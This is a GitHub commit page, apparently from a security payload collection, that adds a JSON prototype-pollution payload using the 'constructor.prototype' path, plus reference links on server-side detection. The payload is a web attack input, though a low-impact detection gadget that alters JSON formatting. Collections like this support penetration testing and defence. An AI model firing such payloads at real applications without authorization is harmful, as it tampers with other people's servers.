Skip to content

Commit

Permalink
adding the payload for Polluting the prototype via the constructor
Browse files Browse the repository at this point in the history 
…property in JSON input

Somtimes `__proto__` property may not work, so adding the payload for Polluting the prototype via the `constructor` property in JSON input
  • Loading branch information
@Aftab700
Aftab700 authored Jan 3, 2024
1 parent cbc6e78 commit 08063f0
Showing 1 changed file with 14 additions and 1 deletion.
15 changes: 14 additions & 1 deletion Prototype Pollution/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -99,6 +99,19 @@ Asynchronous payload for NodeJS.
}
```

Polluting the prototype via the `constructor` property instead.

```js
{
"constructor": {
"prototype": {
"foo": "bar",
"json spaces": 10
}
}
}
```


### Prototype Pollution in URL

Expand Down Expand Up @@ -176,4 +189,4 @@ Either create your own gadget using part of the source with [yeswehack/pp-finder
* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4)
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)

0 comments on commit 08063f0

Please sign in to comment.